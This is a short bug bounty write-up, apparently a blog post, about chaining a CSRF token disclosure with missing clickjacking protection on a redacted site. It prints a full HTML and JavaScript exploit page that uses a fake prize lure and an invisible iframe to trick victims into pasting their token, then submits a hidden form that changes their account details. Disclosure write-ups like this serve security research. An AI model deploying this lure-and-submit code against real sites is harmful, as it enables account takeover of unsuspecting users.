Bypass CSRF With ClickJacking Worth $1250

Saad Ahmed
2 min readJul 16, 2019

--

Hello friends, I hope you all are doing well, so this write up is all about how I chained the two different vulnerabilities to update the victim account details. Let’s assume the website name is redacted.com

So when I visited the profile page https://redacted.com/editinfo/& tried to change the account details there was a CSRF token I tried different methods to bypass that CSRF protection but failed, then I found the suspicious endpoint that was disclosing the CSRF token https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/

So when I opened that endpoint I found the CSRF token in the response, Now the next part was to steal the CSRF token & then I found out that there was no protection from the click jacking I created an HTML + JS Script to exploit the CSRF in just 1 Click

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win a $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/" width=”100%” style=”opacity: 0"></iframe>

</div>

<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">

<br>
<button id=”btn”>Click to Win</button>

<div style=”display: none;”>
<form action=”” method=”POST”>
<input type=”hidden” name=”addrid” value=”12741305" />
<input type=”hidden” name=”uname” value=”hack@gmail.com” />
<input type=”hidden” name=”issendmsg” value=”1" />
<input type=”hidden” name=”display” value=”” />
<input type=”hidden” name=”sendtype” value=”update” />
<input type=”hidden” name=”firstname” value=”accountinfo” />
<input type=”hidden” name=”lastname” value=”HACKED” />
<input type=”hidden” name=”country” value=”US” />
<input type=”hidden” name=”reglang” value=”en&#95;US” />
<input type=”hidden” name=”postcode” value=”1337" />
<input type=”submit” value=”Submit request” />
</form>
</div>

</body>

<script>
document.querySelector(“#btn”).onclick = function() {
var token = document.querySelector(“input”).value
var form = document.querySelector(“form”)

token = JSON.parse(token)
var mapInput = document.createElement(“input”);
mapInput.type = “hidden”;
mapInput.name = “auth_token”;
mapInput.value = token.Value;

form.appendChild(mapInput)

form.action = `https://redacted.com/editInfo`
form.submit();
alert(“Congratulation! You have won $100”)
}
</script>

</html>

So when the victim pastes the api response in the field & clicks on CLICK TO WIN. The js code will append the input field in form with the CSRF token that i got from victim & made request to update the account details & Boom it worked. I hope you like it

./LOGOUT

--

--